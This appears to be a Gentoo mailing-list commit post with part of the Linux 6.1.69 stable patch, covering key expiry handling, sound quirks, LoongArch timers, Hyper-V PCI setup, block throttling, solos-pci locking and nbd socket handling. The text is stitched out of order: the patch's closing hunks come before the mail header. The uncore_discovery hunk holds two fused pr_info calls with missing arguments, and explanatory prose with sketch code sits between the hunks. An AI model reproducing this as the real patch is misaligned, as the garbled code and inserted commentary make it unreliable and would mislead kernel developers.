+ 	kenter("[%lx,%x]", key_gc_flags, gc_state);
+ 
+ 	limit = ktime_get_real_seconds();
+-	if (limit > key_gc_delay)
+-		limit -= key_gc_delay;
+-	else
+-		limit = key_gc_delay;
+ 
+ 	/* Work out what we're going to be doing in this pass */
+ 	gc_state &= KEY_GC_REAPING_DEAD_1 | KEY_GC_REAPING_DEAD_2;
+ 	gc_state <<= 1;
+ 	if (test_and_clear_bit(KEY_GC_KEY_EXPIRED, &key_gc_flags))
+-		gc_state |= KEY_GC_REAPING_LINKS | KEY_GC_SET_TIMER;
++		gc_state |= KEY_GC_REAPING_LINKS;
+ 
+ 	if (test_and_clear_bit(KEY_GC_REAP_KEYTYPE, &key_gc_flags))
+ 		gc_state |= KEY_GC_REAPING_DEAD_1;
+@@ -233,8 +241,11 @@ continue_scanning:
+ 			}
+ 		}
+ 
+-		if (gc_state & KEY_GC_SET_TIMER) {
+-			if (key->expiry > limit && key->expiry < new_timer) {
++		expiry = key->expiry;
++		if (expiry != TIME64_MAX) {
++			if (!(key->type->flags & KEY_TYPE_INSTANT_REAP))
++				expiry += key_gc_delay;
++			if (expiry > limit && expiry < new_timer) {
+ 				kdebug("will expire %x in %lld",
+ 				       key_serial(key), key->expiry - limit);
+ 				new_timer = key->expiry;
+@@ -276,7 +287,7 @@ maybe_resched:
+ 	 */
+ 	kdebug("pass complete");
+ 
+-	if (gc_state & KEY_GC_SET_TIMER && new_timer != (time64_t)TIME64_MAX) {
++	if (new_timer != TIME64_MAX) {
+ 		new_timer += key_gc_delay;
+ 		key_schedule_gc(new_timer);
+ 	}
+diff --git a/security/keys/internal.h b/security/keys/internal.h
+index 3c1e7122076b9..ec2ec335b6133 100644
+--- a/security/keys/internal.h
++++ b/security/keys/internal.h
+@@ -174,6 +174,7 @@ extern unsigned key_gc_delay;
+ extern void keyring_gc(struct key *keyring, time64_t limit);
+ extern void keyring_restriction_gc(struct key *keyring,
+ 				   struct key_type *dead_type);
++void key_set_expiry(struct key *key, time64_t expiry);
+ extern void key_schedule_gc(time64_t gc_at);
+ extern void key_schedule_gc_links(void);
+ extern void key_gc_keytype(struct key_type *ktype);
+@@ -222,10 +223,18 @@ extern struct key *key_get_instantiation_authkey(key_serial_t target_id);
+  */
+ static inline bool key_is_dead(const struct key *key, time64_t limit)
+ {
++	time64_t expiry = key->expiry;
++
++	if (expiry != TIME64_MAX) {
++		if (!(key->type->flags & KEY_TYPE_INSTANT_REAP))
++			expiry += key_gc_delay;
++		if (expiry <= limit)
++			return true;
++	}
++
+ 	return
+ 		key->flags & ((1 << KEY_FLAG_DEAD) |
+ 			      (1 << KEY_FLAG_INVALIDATED)) ||
+-		(key->expiry > 0 && key->expiry <= limit) ||
+ 		key->domain_tag->removed;
+ }
+ 
+diff --git a/security/keys/key.c b/security/keys/key.c
+index c45afdd1dfbb4..e65240641ca57 100644
+--- a/security/keys/key.c
++++ b/security/keys/key.c
+@@ -294,6 +294,7 @@ struct key *key_alloc(struct key_type *type, const char *desc,
+ 	key->uid = uid;
+ 	key->gid = gid;
+ 	key->perm = perm;
++	key->expiry = TIME64_MAX;
+ 	key->restrict_link = restrict_link;
+ 	key->last_used_at = ktime_get_real_seconds();
+ 
+@@ -463,10 +464,7 @@ static int __key_instantiate_and_link(struct key *key,
+ 			if (authkey)
+ 				key_invalidate(authkey);
+ 
+-			if (prep->expiry != TIME64_MAX) {
+-				key->expiry = prep->expiry;
+-				key_schedule_gc(prep->expiry + key_gc_delay);
+-			}
++			key_set_expiry(key, prep->expiry);
+ 		}
+ 	}
+ 
+@@ -606,8 +604,7 @@ int key_reject_and_link(struct key *key,
+ 		atomic_inc(&key->user->nikeys);
+ 		mark_key_instantiated(key, -error);
+ 		notify_key(key, NOTIFY_KEY_INSTANTIATED, -error);
+-		key->expiry = ktime_get_real_seconds() + timeout;
+-		key_schedule_gc(key->expiry + key_gc_delay);
++		key_set_expiry(key, ktime_get_real_seconds() + timeout);
+ 
+ 		if (test_and_clear_bit(KEY_FLAG_USER_CONSTRUCT, &key->flags))
+ 			awaken = 1;
+@@ -722,16 +719,14 @@ found_kernel_type:
+ 
+ void key_set_timeout(struct key *key, unsigned timeout)
+ {
+-	time64_t expiry = 0;
++	time64_t expiry = TIME64_MAX;
+ 
+ 	/* make the changes with the locks held to prevent races */
+ 	down_write(&key->sem);
+ 
+ 	if (timeout > 0)
+ 		expiry = ktime_get_real_seconds() + timeout;
+-
+-	key->expiry = expiry;
+-	key_schedule_gc(key->expiry + key_gc_delay);
++	key_set_expiry(key, expiry);
+ 
+ 	up_write(&key->sem);
+ }
+diff --git a/security/keys/proc.c b/security/keys/proc.c
+index d0cde6685627f..4f4e2c1824f18 100644
+--- a/security/keys/proc.c
++++ b/security/keys/proc.c
+@@ -198,7 +198,7 @@ static int proc_keys_show(struct seq_file *m, void *v)
+ 
+ 	/* come up with a suitable timeout value */
+ 	expiry = READ_ONCE(key->expiry);
+-	if (expiry == 0) {
++	if (expiry == TIME64_MAX) {
+ 		memcpy(xbuf, "perm", 5);
+ 	} else if (now >= expiry) {
+ 		memcpy(xbuf, "expd", 5);
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index a7c361e0daebe..a88ed60dcd96a 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9735,6 +9735,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1473, "ASUS GU604V", ALC285_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1483, "ASUS GU603V", ALC285_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1517, "Asus Zenbook UX31A", ALC269VB_FIXUP_ASUS_ZENBOOK_UX31A),
++	SND_PCI_QUIRK(0x1043, 0x1533, "ASUS GV302XA", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1573, "ASUS GZ301V", ALC285_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1662, "ASUS GV301QH", ALC294_FIXUP_ASUS_DUAL_SPK),
+ 	SND_PCI_QUIRK(0x1043, 0x1663, "ASUS GU603ZV", ALC285_FIXUP_ASUS_HEADSET_MIC),
+diff --git a/sound/soc/codecs/hdmi-codec.c b/sound/soc/codecs/hdmi-codec.c
+index 4d3c3365488a2..d8259afc60b08 100644
+--- a/sound/soc/codecs/hdmi-codec.c
++++ b/sound/soc/codecs/hdmi-codec.c
+@@ -834,8 +834,9 @@ static int hdmi_dai_probe(struct snd_soc_dai *dai)
+ static void hdmi_codec_jack_report(struct hdmi_codec_priv *hcp,
+ 				   unsigned int jack_status)
+ {
+-	if (hcp->jack && jack_status != hcp->jack_status) {
+-		snd_soc_jack_report(hcp->jack, jack_status, SND_JACK_LINEOUT);
++	if (jack_status != hcp->jack_status) {
++		if (hcp->jack)
++			snd_soc_jack_report(hcp->jack, jack_status, SND_JACK_LINEOUT);
+ 		hcp->jack_status = jack_status;
+ 	}
+ }
+@@ -864,6 +865,13 @@ static int hdmi_codec_set_jack(struct snd_soc_component *component,
+ 
+ 	if (hcp->hcd.ops->hook_plugged_cb) {
+ 		hcp->jack = jack;
++
++		/*
++		 * Report the initial jack status which may have been provided
++		 * by the parent hdmi driver while the hpd hook was registered.
++		 */
++		snd_soc_jack_report(jack, hcp->jack_status, SND_JACK_LINEOUT);
++
+ 		return 0;
+ 	}
+ 
+diff --git a/sound/soc/fsl/fsl_sai.c b/sound/soc/fsl/fsl_sai.c
+index 6364d9be28fbb..cf1cd0460ad98 100644
+--- a/sound/soc/fsl/fsl_sai.c
++++ b/sound/soc/fsl/fsl_sai.c
+@@ -715,6 +715,9 @@ static int fsl_sai_hw_free(struct snd_pcm_substream *substream,
+ 	bool tx = substream->stream == SNDRV_PCM_STREAM_PLAYBACK;
+ 	unsigned int ofs = sai->soc_data->reg_offset;
+ 
++	/* Clear xMR to avoid channel swap in the mclk_with_tere enabled case */
++	regmap_write(sai->regmap, FSL_SAI_xMR(tx), 0);
++
+ 	regmap_update_bits(sai->regmap, FSL_SAI_xCR3(tx, ofs),
+ 			   FSL_SAI_CR3_TRCE_MASK, 0);
+ 
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index f458328f9ec42..33380cad3a735 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -1385,7 +1385,7 @@ free_buf:
+ 
+ static int snd_usb_motu_m_series_boot_quirk(struct usb_device *dev)
+ {
+-	msleep(2000);
++	msleep(4000);
+ 
+ 	return 0;
+ }
+@@ -1628,7 +1628,7 @@ int snd_usb_apply_boot_quirk_once(struct usb_device *dev,
+ 				  unsigned int id)
+ {
+ 	switch (id) {
+-	case USB_ID(0x07fd, 0x0008): /* MOTU M Series */
++	case USB_ID(0x07fd, 0x0008): /* MOTU M Series, 1st hardware version */
+ 		return snd_usb_motu_m_series_boot_quirk(dev);
+ 	}
+ 
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index ea6fc59e9f62f..e52d513009fb0 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -2652,7 +2652,7 @@ backup_tests()
+ 	fi
+ 
+ 	if reset "mpc backup" &&
+-	   continue_if mptcp_lib_kallsyms_doesnt_have "mptcp_subflow_send_ack$"; then
++	   continue_if mptcp_lib_kallsyms_doesnt_have "T mptcp_subflow_send_ack$"; then
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow,backup
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow
+ 		chk_join_nr 0 0 0
+@@ -2660,7 +2660,7 @@ backup_tests()
+ 	fi
+ 
+ 	if reset "mpc backup both sides" &&
+-	   continue_if mptcp_lib_kallsyms_doesnt_have "mptcp_subflow_send_ack$"; then
++	   continue_if mptcp_lib_kallsyms_doesnt_have "T mptcp_subflow_send_ack$"; then
+ 		pm_nl_add_endpoint $ns1 10.0.1.1 flags subflow,backup
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow,backup
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow
+@@ -2669,7 +2669,7 @@ backup_tests()
+ 	fi
+ 
+ 	if reset "mpc switch to backup" &&
+-	   continue_if mptcp_lib_kallsyms_doesnt_have "mptcp_subflow_send_ack$"; then
++	   continue_if mptcp_lib_kallsyms_doesnt_have "T mptcp_subflow_send_ack$"; then
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow backup
+ 		chk_join_nr 0 0 0
+@@ -2677,7 +2677,7 @@ backup_tests()
+ 	fi
+ 
+ 	if reset "mpc switch to backup both sides" &&
+-	   continue_if mptcp_lib_kallsyms_doesnt_have "mptcp_subflow_send_ack$"; then
++	   continue_if mptcp_lib_kallsyms_doesnt_have "T mptcp_subflow_send_ack$"; then
+ 		pm_nl_add_endpoint $ns1 10.0.1.1 flags subflow
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow backup


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-12-20 16:56 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-12-20 16:56 UTC (permalink / raw
  To: gentoo-commits

commit:     df521057576f25c519318776dee39439f5d07dc0
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Dec 20 16:55:58 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Dec 20 16:55:58 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=df521057

Linux patch 6.1.69

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1068_linux-6.1.69.patch | 4110 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 4114 insertions(+)

diff --git a/0000_README b/0000_README
index a8206ed1..3d9aed2d 100644
--- a/0000_README
+++ b/0000_README
@@ -315,6 +315,10 @@ Patch:  1067_linux-6.1.68.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.68
 
+Patch:  1068_linux-6.1.69.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.69
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1068_linux-6.1.69.patch b/1068_linux-6.1.69.patch
new file mode 100644
index 00000000..fd8d28e1
--- /dev/null
+++ b/1068_linux-6.1.69.patch
@@ -0,0 +1,4110 @@
+diff --git a/Makefile b/Makefile
+index 2a8ad0cec2f1c..9a3b34d2387fa 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 68
++SUBLEVEL = 69
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/Makefile b/arch/arm64/Makefile
+index 5e56d26a22398..c9496539c3351 100644
+--- a/arch/arm64/Makefile
++++ b/arch/arm64/Makefile
+@@ -157,7 +157,7 @@ endif
+ 
+ all:	$(notdir $(KBUILD_IMAGE))
+ 
+-
++vmlinuz.efi: Image
+ Image vmlinuz.efi: vmlinux
+ 	$(Q)$(MAKE) $(build)=$(boot) $(boot)/$@
+ 
+diff --git a/arch/arm64/include/asm/pgtable.h b/arch/arm64/include/asm/pgtable.h
+index 5d0f1f7b76004..56c7df4c65325 100644
+--- a/arch/arm64/include/asm/pgtable.h
++++ b/arch/arm64/include/asm/pgtable.h
+@@ -822,6 +822,12 @@ static inline pte_t pte_modify(pte_t pte, pgprot_t newprot)
+ 	if (pte_hw_dirty(pte))
+ 		pte = pte_mkdirty(pte);
+ 	pte_val(pte) = (pte_val(pte) & ~mask) | (pgprot_val(newprot) & mask);
++	/*
++	 * If we end up clearing hw dirtiness for a sw-dirty PTE, set hardware
++	 * dirtiness again.
++	 */
++	if (pte_sw_dirty(pte))
++		pte = pte_mkdirty(pte);
+ 	return pte;
+ }
+ 
+diff --git a/arch/loongarch/Makefile b/arch/loongarch/Makefile
+index 01b57b7263225..ed47a3a87768e 100644
+--- a/arch/loongarch/Makefile
++++ b/arch/loongarch/Makefile
+@@ -116,6 +116,8 @@ vdso_install:
+ 
+ all:	$(notdir $(KBUILD_IMAGE))
+ 
++vmlinuz.efi: vmlinux.efi
++
+ vmlinux.elf vmlinux.efi vmlinuz.efi: vmlinux
+ 	$(Q)$(MAKE) $(build)=$(boot) $(bootvars-y) $(boot)/$@
+ 
+diff --git a/arch/loongarch/kernel/time.c b/arch/loongarch/kernel/time.c
+index d2b7d5df132a9..150df6e17bb6a 100644
+--- a/arch/loongarch/kernel/time.c
++++ b/arch/loongarch/kernel/time.c
+@@ -58,14 +58,16 @@ static int constant_set_state_oneshot(struct clock_event_device *evt)
+ 	return 0;
+ }
+ 
+-static int constant_set_state_oneshot_stopped(struct clock_event_device *evt)
++static int constant_set_state_periodic(struct clock_event_device *evt)
+ {
++	unsigned long period;
+ 	unsigned long timer_config;
+ 
+ 	raw_spin_lock(&state_lock);
+ 
+-	timer_config = csr_read64(LOONGARCH_CSR_TCFG);
+-	timer_config &= ~CSR_TCFG_EN;
++	period = const_clock_freq / HZ;
++	timer_config = period & CSR_TCFG_VAL;
++	timer_config |= (CSR_TCFG_PERIOD | CSR_TCFG_EN);
+ 	csr_write64(timer_config, LOONGARCH_CSR_TCFG);
+ 
+ 	raw_spin_unlock(&state_lock);
+@@ -73,16 +75,14 @@ static int constant_set_state_oneshot_stopped(struct clock_event_device *evt)
+ 	return 0;
+ }
+ 
+-static int constant_set_state_periodic(struct clock_event_device *evt)
++static int constant_set_state_shutdown(struct clock_event_device *evt)
+ {
+-	unsigned long period;
+ 	unsigned long timer_config;
+ 
+ 	raw_spin_lock(&state_lock);
+ 
+-	period = const_clock_freq / HZ;
+-	timer_config = period & CSR_TCFG_VAL;
+-	timer_config |= (CSR_TCFG_PERIOD | CSR_TCFG_EN);
++	timer_config = csr_read64(LOONGARCH_CSR_TCFG);
++	timer_config &= ~CSR_TCFG_EN;
+ 	csr_write64(timer_config, LOONGARCH_CSR_TCFG);
+ 
+ 	raw_spin_unlock(&state_lock);
+@@ -90,11 +90,6 @@ static int constant_set_state_periodic(struct clock_event_device *evt)
+ 	return 0;
+ }
+ 
+-static int constant_set_state_shutdown(struct clock_event_device *evt)
+-{
+-	return 0;
+-}
+-
+ static int constant_timer_next_event(unsigned long delta, struct clock_event_device *evt)
+ {
+ 	unsigned long timer_config;
+@@ -156,7 +151,7 @@ int constant_clockevent_init(void)
+ 	cd->rating = 320;
+ 	cd->cpumask = cpumask_of(cpu);
+ 	cd->set_state_oneshot = constant_set_state_oneshot;
+-	cd->set_state_oneshot_stopped = constant_set_state_oneshot_stopped;
++	cd->set_state_oneshot_stopped = constant_set_state_shutdown;
+ 	cd->set_state_periodic = constant_set_state_periodic;
+ 	cd->set_state_shutdown = constant_set_state_shutdown;
+ 	cd->set_next_event = constant_timer_next_event;
+diff --git a/arch/powerpc/kernel/trace/ftrace_mprofile.S b/arch/powerpc/kernel/trace/ftrace_mprofile.S
+index 6f9c2dea905b7..f4a72b38488f7 100644
+--- a/arch/powerpc/kernel/trace/ftrace_mprofile.S
++++ b/arch/powerpc/kernel/trace/ftrace_mprofile.S
+@@ -62,7 +62,7 @@
+ 	.endif
+ 
+ 	/* Save previous stack pointer (r1) */
+-	addi	r8, r1, SWITCH_FRAME_SIZE
++	addi	r8, r1, SWITCH_FRAME_SIZE+STACK_FRAME_MIN_SIZE
+ 	PPC_STL	r8, GPR1(r1)
+ 
+ 	.if \allregs == 1
+@@ -182,7 +182,7 @@ ftrace_no_trace:
+ 	mflr	r3
+ 	mtctr	r3
+ 	REST_GPR(3, r1)
+-	addi	r1, r1, SWITCH_FRAME_SIZE
++	addi	r1, r1, SWITCH_FRAME_SIZE+STACK_FRAME_MIN_SIZE
+ 	mtlr	r0
+ 	bctr
+ #endif
+diff --git a/arch/x86/events/intel/uncore_discovery.c b/arch/x86/events/intel/uncore_discovery.c
+index 5fd72d4b8bbb0..7d454141433c8 100644
+--- a/arch/x86/events/intel/uncore_discovery.c
++++ b/arch/x86/events/intel/uncore_discovery.c
+@@ -140,13 +140,21 @@ uncore_insert_box_info(struct uncore_unit_discovery *unit,
+ 	unsigned int *box_offset, *ids;
+ 	int i;
+ 
+-	if (WARN_ON_ONCE(!unit->ctl || !unit->ctl_offset || !unit->ctr_offset))
++	if (!unit->ctl || !unit->ctl_offset || !unit->ctr_offset) {
++		pr_info("Invalid address is detected for uncore type %d box %d, "
++		pr_info("Invalid address detected for uncore type %d box %d; "
++			"disabling the uncore unit.\n",
+ 		return;
++	}
+ 
+ 	if (parsed) {
+ 		type = search_uncore_discovery_type(unit->box_type);
+-		if (WARN_ON_ONCE(!type))
++		if (!type) {
++			pr_info("Spurious uncore type %d detected; "
++				"disabling the uncore type.\n",
++				unit->box_type);
+ 			return;
++		}
+ 		/* Store the first box of each die */
+ 		if (!type->box_ctrl_die[die])
+ 			type->box_ctrl_die[die] = unit->ctl;
+@@ -181,8 +189,12 @@ uncore_insert_box_info(struct uncore_unit_discovery *unit,
+ 		ids[i] = type->ids[i];
+ 		box_offset[i] = type->box_offset[i];
+ 
+-		if (WARN_ON_ONCE(unit->box_id == ids[i]))
++		if (unit->box_id == ids[i]) {
++			pr_info("Duplicate uncore type %d box ID %d detected; "
++				"dropping the duplicate uncore unit.\n",
++				unit->box_type, unit->box_id);
+ 			goto free_ids;
++		}
+ 	}
+ 	ids[i] = unit->box_id;
+ 	box_offset[i] = unit->ctl - type->box_ctrl;
+diff --git a/arch/x86/hyperv/hv_init.c b/arch/x86/hyperv/hv_init.c
+index 189ae92de4d06..c18e5c764643b 100644
+--- a/arch/x86/hyperv/hv_init.c
++++ b/arch/x86/hyperv/hv_init.c
+@@ -13,6 +13,7 @@
+ #include <linux/io.h>
+ #include <asm/apic.h>
+ #include <asm/desc.h>
++#include <asm/e820/api.h>
+ #include <asm/sev.h>
+ #include <asm/ibt.h>
+ #include <asm/hypervisor.h>
+@@ -267,15 +268,31 @@ static int hv_cpu_die(unsigned int cpu)
+ 
+ static int __init hv_pci_init(void)
+ {
+-	int gen2vm = efi_enabled(EFI_BOOT);
++	bool gen2vm = efi_enabled(EFI_BOOT);
+ 
+ 	/*
+-	 * For Generation-2 VM, we exit from pci_arch_init() by returning 0.
+-	 * The purpose is to suppress the harmless warning:
++	 * A Generation-2 VM doesn't support legacy PCI/PCIe, so both
++	 * raw_pci_ops and raw_pci_ext_ops are NULL, and pci_subsys_init() ->
++	 * pcibios_init() doesn't call pcibios_resource_survey() ->
++	 * e820__reserve_resources_late(); as a result, any emulated persistent
++	 * memory of E820_TYPE_PRAM (12) via the kernel parameter
++	 * memmap=nn[KMG]!ss is not added into iomem_resource and hence can't be
++	 * detected by register_e820_pmem(). Fix this by directly calling
++	 * e820__reserve_resources_late() here: e820__reserve_resources_late()
++	 * depends on e820__reserve_resources(), which has been called earlier
++	 * from setup_arch(). Note: e820__reserve_resources_late() also adds
++	 * any memory of E820_TYPE_PMEM (7) into iomem_resource, and
++	 * acpi_nfit_register_region() -> acpi_nfit_insert_resource() ->
++	 * region_intersects() returns REGION_INTERSECTS, so the memory of
++	 * E820_TYPE_PMEM won't get added twice.
++	 *
++	 * We return 0 here so that pci_arch_init() won't print the warning:
+ 	 * "PCI: Fatal: No config space access function found"
+ 	 */
+-	if (gen2vm)
++	if (gen2vm) {
++		e820__reserve_resources_late();
+ 		return 0;
++	}
+ 
+ 	/* For Generation-1 VM, we'll proceed in pci_arch_init().  */
+ 	return 1;
+diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c
+index 60f366f98fa2b..1b7fd1fc2f337 100644
+--- a/block/blk-cgroup.c
++++ b/block/blk-cgroup.c
+@@ -462,6 +462,7 @@ static void blkg_destroy_all(struct gendisk *disk)
+ 	struct request_queue *q = disk->queue;
+ 	struct blkcg_gq *blkg, *n;
+ 	int count = BLKG_DESTROY_BATCH_SIZE;
++	int i;
+ 
+ restart:
+ 	spin_lock_irq(&q->queue_lock);
+@@ -487,6 +488,18 @@ restart:
+ 		}
+ 	}
+ 
++	/*
++	 * Mark policy deactivated since policy offline has been done, and
++	 * the free is scheduled, so future blkcg_deactivate_policy() can
++	 * be bypassed
++	 */
++	for (i = 0; i < BLKCG_MAX_POLS; i++) {
++		struct blkcg_policy *pol = blkcg_policy[i];
++
++		if (pol)
++			__clear_bit(pol->plid, q->blkcg_pols);
++	}
++
+ 	q->root_blkg = NULL;
+ 	spin_unlock_irq(&q->queue_lock);
+ }
+diff --git a/block/blk-throttle.c b/block/blk-throttle.c
+index 009b0d76bf036..62a3f62316df1 100644
+--- a/block/blk-throttle.c
++++ b/block/blk-throttle.c
+@@ -1333,6 +1333,7 @@ static void tg_conf_updated(struct throtl_grp *tg, bool global)
+ 		   tg_bps_limit(tg, READ), tg_bps_limit(tg, WRITE),
+ 		   tg_iops_limit(tg, READ), tg_iops_limit(tg, WRITE));
+ 
++	rcu_read_lock();
+ 	/*
+ 	 * Update has_rules[] flags for the updated tg's subtree.  A tg is
+ 	 * considered to have rules if either the tg itself or any of its
+@@ -1360,6 +1361,7 @@ static void tg_conf_updated(struct throtl_grp *tg, bool global)
+ 		this_tg->latency_target = max(this_tg->latency_target,
+ 				parent_tg->latency_target);
+ 	}
++	rcu_read_unlock();
+ 
+ 	/*
+ 	 * We're already holding queue_lock and know @tg is valid.  Let's
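
The rcu_read_lock()/rcu_read_unlock() pair added above brackets the walk of the throttle-group hierarchy, the standard pattern for traversing an RCU-protected structure without taking the updater's lock. A minimal sketch of the pattern, with a hypothetical node type rather than the real blkcg/throtl structures:

#include <linux/rcupdate.h>
#include <linux/rculist.h>

struct node {
	unsigned int limit;
	struct list_head entry;		/* on an RCU-protected list */
};

static unsigned int max_limit(struct list_head *head)
{
	struct node *n;
	unsigned int m = 0;

	rcu_read_lock();		/* pins every node we can observe */
	list_for_each_entry_rcu(n, head, entry)
		if (n->limit > m)
			m = n->limit;
	rcu_read_unlock();		/* nodes may be reclaimed after this */
	return m;
}
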
+diff --git a/drivers/atm/solos-pci.c b/drivers/atm/solos-pci.c
+index 94fbc3abe60e6..d3c30a28c410e 100644
+--- a/drivers/atm/solos-pci.c
++++ b/drivers/atm/solos-pci.c
+@@ -449,9 +449,9 @@ static ssize_t console_show(struct device *dev, struct device_attribute *attr,
+ 	struct sk_buff *skb;
+ 	unsigned int len;
+ 
+-	spin_lock(&card->cli_queue_lock);
++	spin_lock_bh(&card->cli_queue_lock);
+ 	skb = skb_dequeue(&card->cli_queue[SOLOS_CHAN(atmdev)]);
+-	spin_unlock(&card->cli_queue_lock);
++	spin_unlock_bh(&card->cli_queue_lock);
+ 	if(skb == NULL)
+ 		return sprintf(buf, "No data.\n");
+ 
+@@ -956,14 +956,14 @@ static void pclose(struct atm_vcc *vcc)
+ 	struct pkt_hdr *header;
+ 
+ 	/* Remove any yet-to-be-transmitted packets from the pending queue */
+-	spin_lock(&card->tx_queue_lock);
++	spin_lock_bh(&card->tx_queue_lock);
+ 	skb_queue_walk_safe(&card->tx_queue[port], skb, tmpskb) {
+ 		if (SKB_CB(skb)->vcc == vcc) {
+ 			skb_unlink(skb, &card->tx_queue[port]);
+ 			solos_pop(vcc, skb);
+ 		}
+ 	}
+-	spin_unlock(&card->tx_queue_lock);
++	spin_unlock_bh(&card->tx_queue_lock);
+ 
+ 	skb = alloc_skb(sizeof(*header), GFP_KERNEL);
+ 	if (!skb) {
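
The switch from spin_lock() to spin_lock_bh() matters because these queues are also touched from the card's softirq (bottom-half) path: taking the lock from process context without disabling BHs can deadlock if the softirq fires on the same CPU while the lock is held. A sketch of the rule with a hypothetical driver structure:

#include <linux/spinlock.h>
#include <linux/skbuff.h>

struct card {
	spinlock_t q_lock;		/* also taken from softirq context */
	struct sk_buff_head q;
};

/* Process-context consumer: must use the _bh variant. */
static struct sk_buff *card_dequeue(struct card *c)
{
	struct sk_buff *skb;

	spin_lock_bh(&c->q_lock);	/* masks local BHs while held */
	skb = skb_dequeue(&c->q);
	spin_unlock_bh(&c->q_lock);
	return skb;
}
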
+diff --git a/drivers/block/nbd.c b/drivers/block/nbd.c
+index e94d2ff6b1223..8037aaefeb2ed 100644
+--- a/drivers/block/nbd.c
++++ b/drivers/block/nbd.c
+@@ -67,6 +67,7 @@ struct nbd_sock {
+ struct recv_thread_args {
+ 	struct work_struct work;
+ 	struct nbd_device *nbd;
++	struct nbd_sock *nsock;
+ 	int index;
+ };
+ 
+@@ -489,15 +490,9 @@ done:
+ 	return BLK_EH_DONE;
+ }
+ 
+-/*
+- *  Send or receive packet. Return a positive value on success and
+- *  negtive value on failue, and never return 0.
+- */
+-static int sock_xmit(struct nbd_device *nbd, int index, int send,
+-		     struct iov_iter *iter, int msg_flags, int *sent)
++static int __sock_xmit(struct nbd_device *nbd, struct socket *sock, int send,
++		       struct iov_iter *iter, int msg_flags, int *sent)
+ {
+-	struct nbd_config *config = nbd->config;
+-	struct socket *sock = config->socks[index]->sock;
+ 	int result;
+ 	struct msghdr msg;
+ 	unsigned int noreclaim_flag;
+@@ -539,6 +534,19 @@ static int sock_xmit(struct nbd_device *nbd, int index, int send,
+ 	return result;
+ }
+ 
++/*
++ *  Send or receive packet. Return a positive value on success and
++ *  negative value on failure, and never return 0.
++ */
++static int sock_xmit(struct nbd_device *nbd, int index, int send,
++		     struct iov_iter *iter, int msg_flags, int *sent)
++{
++	struct nbd_config *config = nbd->config;
++	struct socket *sock = config->socks[index]->sock;
++
++	return __sock_xmit(nbd, sock, send, iter, msg_flags, sent);
++}
++
+ /*
+  * Different settings for sk->sk_sndtimeo can result in different return values
+  * if there is a signal pending when we enter sendmsg, because reasons?
+@@ -695,7 +703,7 @@ out:
+ 	return 0;
+ }
+ 
+-static int nbd_read_reply(struct nbd_device *nbd, int index,
++static int nbd_read_reply(struct nbd_device *nbd, struct socket *sock,
+ 			  struct nbd_reply *reply)
+ {
+ 	struct kvec iov = {.iov_base = reply, .iov_len = sizeof(*reply)};
+@@ -704,7 +712,7 @@ static int nbd_read_reply(struct nbd_device *nbd, int index,
+ 
+ 	reply->magic = 0;
+ 	iov_iter_kvec(&to, ITER_DEST, &iov, 1, sizeof(*reply));
+-	result = sock_xmit(nbd, index, 0, &to, MSG_WAITALL, NULL);
++	result = __sock_xmit(nbd, sock, 0, &to, MSG_WAITALL, NULL);
+ 	if (result < 0) {
+ 		if (!nbd_disconnected(nbd->config))
+ 			dev_err(disk_to_dev(nbd->disk),
+@@ -828,14 +836,14 @@ static void recv_work(struct work_struct *work)
+ 	struct nbd_device *nbd = args->nbd;
+ 	struct nbd_config *config = nbd->config;
+ 	struct request_queue *q = nbd->disk->queue;
+-	struct nbd_sock *nsock;
++	struct nbd_sock *nsock = args->nsock;
+ 	struct nbd_cmd *cmd;
+ 	struct request *rq;
+ 
+ 	while (1) {
+ 		struct nbd_reply reply;
+ 
+-		if (nbd_read_reply(nbd, args->index, &reply))
++		if (nbd_read_reply(nbd, nsock->sock, &reply))
+ 			break;
+ 
+ 		/*
+@@ -870,7 +878,6 @@ static void recv_work(struct work_struct *work)
+ 		percpu_ref_put(&q->q_usage_counter);
+ 	}
+ 
